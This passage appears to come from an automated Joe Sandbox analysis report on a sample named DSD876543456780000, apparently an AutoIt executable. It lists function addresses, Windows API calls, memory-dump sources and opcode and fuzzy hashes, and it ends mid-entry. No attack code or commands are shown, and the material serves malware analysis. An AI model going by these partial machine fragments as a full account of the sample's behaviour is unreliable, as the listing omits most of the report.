                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: __wsopen_s
                                        • String ID:
                                        • API String ID: 3347428461-0
                                        • Opcode ID: f4fc1c9a3381447ac0a67cf00eb5742e2c2031c2a180729a8ce349c6485bb683
                                        • Instruction ID: e8c73aa81f6bfbf1a392c553ca3f0fbe8b6de3e3d1e890549f0f74587526c07f
                                        • Opcode Fuzzy Hash: f4fc1c9a3381447ac0a67cf00eb5742e2c2031c2a180729a8ce349c6485bb683
                                        • Instruction Fuzzy Hash: 0111187590420AAFCB05DF58E941A9E7BF5EF48314F144059F818AB312DA31DA25CBA5
                                        Function 00BF9A40 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,00BF543F,?,00010000,00000000,00000000,00000000,00000000), ref: 00BF9A9C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 12fd7f14d853ffceb545f555d9d9676c1c61b5fc70b0256fe572e0f48bef0ec1
                                        • Instruction ID: 99db8eafe928743fce384acfadcc7161857b071eed368bf737759b2823726c25
                                        • Opcode Fuzzy Hash: 12fd7f14d853ffceb545f555d9d9676c1c61b5fc70b0256fe572e0f48bef0ec1
                                        • Instruction Fuzzy Hash: D11148312047099FD720CF09C880B76B7F9EF44764F10C46EEA9B8BA51C770A949CB60
                                        Function 00C25000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00C24C7D: RtlAllocateHeap.NTDLL(00000008,00BF1129,00000000,?,00C22E29,00000001,00000364,?,?,?,00C1F2DE,00C23863,00CC1444,?,00C0FDF5,?), ref: 00C24CBE
                                        • _free.LIBCMT ref: 00C2506C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: AllocateHeap_free
                                        • String ID:
                                        • API String ID: 614378929-0
                                        • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                        • Instruction ID: 70251e5ba34e539e5b4dd265d327a89170a9ca166a0b2873d2117b6396394f1a
                                        • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                        • Instruction Fuzzy Hash: DC0126722047146BE3218F69AC81A5AFBECFB89370F65051DE194836C0EA30A905C6B4
                                        Function 00C1E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                        • Instruction ID: 7d26543496eafd179b8e6bc32addcbfc798519b4386b4762efb75f13de92b630
                                        • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                        • Instruction Fuzzy Hash: A6F0F432511A28EAC6313A6AEC05BDA33989F53330F100715F822D25D2CB70E986B6A5
                                        Function 00C24C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000008,00BF1129,00000000,?,00C22E29,00000001,00000364,?,?,?,00C1F2DE,00C23863,00CC1444,?,00C0FDF5,?), ref: 00C24CBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: 085f21ea766d519263c443111cff625a93f9efedb36e2e2536262abc586cd23e
                                        • Instruction ID: 47ff6755fcb62dd7d85fc635e456c31d8a705c868eb4cadde33e95c68512978e
                                        • Opcode Fuzzy Hash: 085f21ea766d519263c443111cff625a93f9efedb36e2e2536262abc586cd23e
                                        • Instruction Fuzzy Hash: 80F0E03160263467DB295F6EFC05F5A3748BF427A0B144115FC2596A91CA70D90156E0
                                        Function 00C23820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000,?,00CC1444,?,00C0FDF5,?,?,00BFA976,00000010,00CC1440,00BF13FC,?,00BF13C6,?,00BF1129), ref: 00C23852
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: 58591f3ea0f9b9cd32582a4aa2045bf46671ffa670d69832104c40c064c175f8
                                        • Instruction ID: ed0a357db3f0cc65766d06c8a4c7133cb11f20b6eb4f62d5a2d7c2886776c2d9
                                        • Opcode Fuzzy Hash: 58591f3ea0f9b9cd32582a4aa2045bf46671ffa670d69832104c40c064c175f8
                                        • Instruction Fuzzy Hash: 7BE0E5322002B456D7212667BC04BDA3759AF43BB4F1A0022BD259EDD1CB69DF02A2F0
                                        Function 00BF4F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                        Download Yara Rule
                                        APIs
                                        • FreeLibrary.KERNEL32(?,?,00CC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BF4F6D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: FreeLibrary
                                        • String ID:
                                        • API String ID: 3664257935-0
                                        • Opcode ID: 401e86668dabcd254b87e5995720805efa3cfdd54103a38d7740a590f7535cef
                                        • Instruction ID: 322cfa3537d4f6f90419bcdbff78af5645450cf91d835293ebfdc02cd89ecd37
                                        • Opcode Fuzzy Hash: 401e86668dabcd254b87e5995720805efa3cfdd54103a38d7740a590f7535cef
                                        • Instruction Fuzzy Hash: DAF01571505756CFDB349F64D4D4927BBE4EF1432932089AEE2EE83621CB31A888EB10
                                        Function 00BF2DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00BF2DC4
                                          • Part of subcall function 00BF6B57: _wcslen.LIBCMT ref: 00BF6B6A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: LongNamePath_wcslen
                                        • String ID:
                                        • API String ID: 541455249-0
                                        • Opcode ID: bea365db0de79afe0b0176d6634edb0f4b87443b62371386b6754fe140c18e25
                                        • Instruction ID: 98577555a9bfc918dfec5859af6ef045d59055ed71acc8cf0bb76bde620bcc1e
                                        • Opcode Fuzzy Hash: bea365db0de79afe0b0176d6634edb0f4b87443b62371386b6754fe140c18e25
                                        • Instruction Fuzzy Hash: 6BE0CD726001245BC710D6989C06FEA77DDDFC8790F0400B1FD09D7248D970AD848650
                                        Function 00C62693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: __fread_nolock
                                        • String ID:
                                        • API String ID: 2638373210-0
                                        • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                        • Instruction ID: 6229a17924c7b0dc9465800ea71fdc05a6eba4c88c540a175d344110636cd8a7
                                        • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                        • Instruction Fuzzy Hash: 01E04FB0609B005FDF395A28E8917F677E89F4A300F00086EF6ABC3252E57268459B4D
                                        Function 00BF2B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00BF3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00BF3908
                                          • Part of subcall function 00BFD730: GetInputState.USER32 ref: 00BFD807
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00BF2B6B
                                          • Part of subcall function 00BF30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00BF314E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                        • String ID:
                                        • API String ID: 3667716007-0
                                        • Opcode ID: c92947ef240af03c6db13f683ecd11b690b1f4948d8da20ece0f2c6efd74f804
                                        • Instruction ID: 9b883afdb3955d77f29fa176ccf96643079bc8ceb1ebc76791ed32d9f43d5804
                                        • Opcode Fuzzy Hash: c92947ef240af03c6db13f683ecd11b690b1f4948d8da20ece0f2c6efd74f804
                                        • Instruction Fuzzy Hash: F6E0863130424C06CA08BB759852BBDA7D9DBD2792F4415BEF74247163CE25894E4351
                                        Function 00B608E0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?), ref: 00B608EB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022038758.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_b60000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                        • Instruction ID: dc1baa595db7d6cac7c2ae912de9f7af81b68e6c776b30a2b7e691a143fdd786
                                        • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                        • Instruction Fuzzy Hash: BAE0867152520CDBD710DBBD8C046AA73E4D704310F104A98E41AC31C1D5388D409654
                                        Function 00C3039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,00000000,?,00C30704,?,?,00000000,?,00C30704,00000000,0000000C), ref: 00C303B7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 3b560321c6702031c7fa8f74af0696acc11d0b06b74a24b4128b2b3a193463b5
                                        • Instruction ID: c85cdda59c6f427dc074e000c23ea09f36724e6df564e033fe8caf26a874a325
                                        • Opcode Fuzzy Hash: 3b560321c6702031c7fa8f74af0696acc11d0b06b74a24b4128b2b3a193463b5
                                        • Instruction Fuzzy Hash: 31D06C3204010DBBDF028F84DD86EDE3BAAFB48714F014000BE1856020C732E821AB94
                                        Function 00B608B0 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?), ref: 00B608BB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022038758.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_b60000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                        • Instruction ID: 37216c9a6c83ca3dba256b56da8e1a36cc5b739289037b9a486d61598e784105
                                        • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                        • Instruction Fuzzy Hash: ACD0A73091620CEBCB10DFB59C04ADB73E8DB04320F104794FD15D32C0D6359D4097A0
                                        Function 00BF1CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                        Download Yara Rule
                                        APIs
                                        • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00BF1CBC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: InfoParametersSystem
                                        • String ID:
                                        • API String ID: 3098949447-0
                                        • Opcode ID: 4eec05bd58567c80d7d2f921206f98b879c2d90daea07447835892761a8e73da
                                        • Instruction ID: 722c25bb1edfa7aa1650c9672a259ed874836b1df6b280f64b742a9c332dcf77
                                        • Opcode Fuzzy Hash: 4eec05bd58567c80d7d2f921206f98b879c2d90daea07447835892761a8e73da
                                        • Instruction Fuzzy Hash: E6C09B352803049FF6145B80FC4AF197754A348B04F084001F609555F3C3F11410F754
                                        Function 00C6744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00BF5745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00BF949C,?,00008000), ref: 00BF5773
                                        • GetLastError.KERNEL32(00000002,00000000), ref: 00C676DE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CreateErrorFileLast
                                        • String ID:
                                        • API String ID: 1214770103-0
                                        • Opcode ID: bb74d3b6f08d57516257d5c206c578a0c4293798ff16d457d27407176f95775d
                                        • Instruction ID: f1aaa572d6802a8e493d978eebd191fe0494a55fba775198a189276577eef1c0
                                        • Opcode Fuzzy Hash: bb74d3b6f08d57516257d5c206c578a0c4293798ff16d457d27407176f95775d
                                        • Instruction Fuzzy Hash: 5C8191306087059FC724EF28C4D1B69B7E1BF88354F044AADF9965B292DB30ED49CB52
                                        Function 00C0FC70 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                        • Instruction ID: d4f29e1771db7f07cb3ac76afdd64afb051dbe9c9653fb9c9de0e4e11472ae7b
                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                        • Instruction Fuzzy Hash: 42310674A00209DBD728CF59D491969F7A2FF49300F2486A9E819CFA95D731EEC2CBC0
                                        Function 00B622DC Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Sleep.KERNELBASE(000001F4), ref: 00B622F1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022038758.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_b60000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                        • Instruction ID: 80b1a08b7a675d39aefefe4bb0f0bf244d8e0a8a12e1d39408ecc7301ffa72da
                                        • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                        • Instruction Fuzzy Hash: 51E0BF7494010DEFDB00EFA4D6496DE7BB4EF04301F1005A1FD05D7680DB309E548A76
                                        Function 00B622E0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Sleep.KERNELBASE(000001F4), ref: 00B622F1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022038758.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_b60000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                        • Instruction ID: e4539b6c488f834ec9a7d0fa6fa8d241c3db76cc984f410d52386351ec7fae8e
                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                        • Instruction Fuzzy Hash: 45E0BF7494010D9FDB00EFA4D64969E7BB4EF04301F1005A1FD0192280D63099508A72

                                        Non-executed Functions

                                        Function 00C89576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00C09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C09BB2
                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00C8961A
                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C8965B
                                        • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00C8969F
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C896C9
                                        • SendMessageW.USER32 ref: 00C896F2
                                        • GetKeyState.USER32(00000011), ref: 00C8978B
                                        • GetKeyState.USER32(00000009), ref: 00C89798
                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C897AE
                                        • GetKeyState.USER32(00000010), ref: 00C897B8
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C897E9
                                        • SendMessageW.USER32 ref: 00C89810
                                        • SendMessageW.USER32(?,00001030,?,00C87E95), ref: 00C89918
                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00C8992E
                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00C89941
                                        • SetCapture.USER32(?), ref: 00C8994A
                                        • ClientToScreen.USER32(?,?), ref: 00C899AF
                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00C899BC
                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C899D6
                                        • ReleaseCapture.USER32 ref: 00C899E1
                                        • GetCursorPos.USER32(?), ref: 00C89A19
                                        • ScreenToClient.USER32(?,?), ref: 00C89A26
                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00C89A80
                                        • SendMessageW.USER32 ref: 00C89AAE
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00C89AEB
                                        • SendMessageW.USER32 ref: 00C89B1A
                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00C89B3B
                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00C89B4A
                                        • GetCursorPos.USER32(?), ref: 00C89B68
                                        • ScreenToClient.USER32(?,?), ref: 00C89B75
                                        • GetParent.USER32(?), ref: 00C89B93
                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00C89BFA
                                        • SendMessageW.USER32 ref: 00C89C2B
                                        • ClientToScreen.USER32(?,?), ref: 00C89C84
                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00C89CB4
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00C89CDE
                                        • SendMessageW.USER32 ref: 00C89D01
                                        • ClientToScreen.USER32(?,?), ref: 00C89D4E
                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00C89D82
                                          • Part of subcall function 00C09944: GetWindowLongW.USER32(?,000000EB), ref: 00C09952
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00C89E05
                                        Strings
                                        Memory Dump Source
